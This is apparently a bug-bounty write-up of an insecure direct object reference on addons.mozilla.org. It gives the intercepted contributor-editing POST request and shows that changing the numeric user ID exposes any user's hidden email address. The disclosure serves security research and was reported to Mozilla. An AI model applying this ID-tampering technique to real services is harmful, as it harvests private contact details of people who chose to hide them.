Email Address disclosure of all the Mozilla Add-ons Account(Indirect Object reference)

Hi All,

Bug Title : Email Address disclosure of all the Mozilla Add-ons Account(Indirect Object reference)

Bug type : Indirect object reference(IDOR)

Category : Broken authentication and privilege escalation

OWASP Link : https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

Organization : Mozilla

Web Application Link : https://addons.mozilla.org/en-US/firefox/

Steps to reproduce:

1.Go to the link : https://addons.mozilla.org/en-US/firefox/users/edit
2.Here you will get a option to hide your email address from other users.
Once you hide your email address no other user can see or get your email address associated with your account.
But there is a way we can get email address of any user.

Steps to reproduce :
1.create a collection and go to collection setting.
2.Now go to Contributor and add any valid email ID of any user.
3.Now save it and intercept this request.
HTTP request : 
POST /en-US/firefox/collections/vijaykumar1110/mypersonalcollections/edit/contributors HTTP/1.0
Host: addons.mozilla.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://addons.mozilla.org/en-US/firefox/collections/vijaykumar1110/mypersonalcollections/edit/
Cookie: optimizelySegments=%7B%22245875585%22%3A%22referral%22%2C%22245617832%22%3A%22none%22%2C%22246048108%22%3A%22false%22%2C%22245677587%22%3A%22ff%22%2C%22869421433%22%3A%22true%22%2C%222000810488%22%3A%22false%22%2C%222017550344%22%3A%22ff%22%2C%221994990450%22%3A%22none%22%2C%222011280991%22%3A%22referral%22%2C%22246002457%22%3A%22referral%22%2C%22246073290%22%3A%22ff%22%2C%22245984388%22%3A%22false%22%2C%22246073289%22%3A%22none%22%7D; optimizelyEndUserId=oeu1439904202539r0.7982840573823196; optimizelyBuckets=%7B%7D; _ga=GA1.2.337997935.1439904205; __utma=164683759.337997935.1439904205.1441817471.1443040970.25; __utmz=164683759.1441743614.22.7.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); mamo=off; __utmb=164683759.14.10.1443040970; anoncsrf=Kzb5CeM039Nta0JFtMQP1lw1MNNjcu7v; __utmc=164683759; sessionid=".eJyrVkouLkqLL8nPTs1TslLKsSiuDMxMzskuLkyvKvWvsPDPD880D7LI8cgIDggysFDSUYpPLC3JiC8tTi2Kz0xRsjI0NDUwszA0QZFISkwGmgeUVQJxi_Wg_GI9x9z8UKCIE1S-FgAPyixu:1Zeqtr:ys0215LtWnbgxtF4mlF_lQ085YA"; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

csrfmiddlewaretoken=l8syQiclksqgzuOx8OoWi7R8lHhSPR08&contributor=11552132

Here POST parameter contributor is a userID of that email Address.Change this user ID to any user and his email ID will be saved in your collection.Now you can get any user's email address even his email is hidden from other users.


Actual results:

So basically this is bypassing the privacy of user's email.It's combination of IDOR and information disclosure bug.

Impact : 
1.Anyone can get the email of any user and contact him.
2.Anyone can add any user to collection and other places where you can only add users trough emailID.
There could be more critical attacks which i may not be aware of. 



Additional Video POC link : https://www.dropbox.com/s/3a6vicbgb4i8sfj/email_mozilla_IDOR.mov?dl=0

Bugzilla Report Link : https://bugzilla.mozilla.org/show_bug.cgi?id=1207807

Thanks for Reading :)

Comments

Popular posts from this blog

Airbnb : Steal Earning of Airbnb hosts by Adding Bank Account/Payment Method (IDOR)

Add Credit Card to Any Uber account Through eats.uber.com(CSRF)

XSS+CSRF attack in Tagged using Redirect parameter(Open URL Redirection attack Possible)